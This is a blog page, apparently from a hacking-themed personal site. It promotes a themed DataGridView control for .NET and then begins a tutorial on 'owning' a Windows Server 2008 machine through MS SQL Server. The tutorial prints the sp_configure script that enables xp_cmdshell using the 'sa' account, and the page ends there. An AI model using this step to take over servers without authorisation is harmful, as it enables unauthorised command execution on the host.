Breaking News
Loading...
  • My Software(s)
  • Hack News
  • Downloads

My Softwares

Hack News

Downloads

Recent Post

Themed DataGridView For .NET Developers

Themed DataGridView For .NET Developers


As we know a DataGridView control provides a customizable table for displaying data.
This control is designed to be a complete solution for displaying tabular data with Windows Forms.
Also the DataGridView class allows us to customization of cells, rows, columns, and borders through the use of its properties.

So i have used and extended the properties of DataGridView and made a user control with predefined set of 8 Themes in it.so that the boring look of the control can be changed to some cool looks :)

You can set the theme of the DataGridView by GridTheme Property:-

Datagridview theme









Download ThemedDataGridView Control

Here is the screenshot for all 8 Themes :-

ThemedDataGridView

1) Orange


Gridview themes
2) Expression

Theme for datagridview
3) Dark1

Datagridview themes
4) Dark2

themes for gridview
5) Dark3

ThemedDataGridView
6) Accent1

datagridview themes
7) Accent2

.net datagridview
8) Accent3
Hacking Server 2008 with MS SQL Server

Hacking Server 2008 with MS SQL Server

Its a short tutorial on owning a windows server with MS Sql Server [xp_cmdshell].
In this scenario iam not using any hacking tools.
All i have is password for 'sa' account of SQL Server.

 

Script to Enable xp_cmdshell in MS SQL Server :-

-- To allow advanced options to be changed.
EXEC sp_configure 'show advanced options', 1
GO
-- To update the currently configured value for advanced options.
RECONFIGURE
GO
-- To enable the feature.
EXEC sp_configure 'xp_cmdshell', 1
GO
-- To update the currently configured value for this feature.
RECONFIGURE
GO



Copyright © 2012 HackWithMak All Right Reserved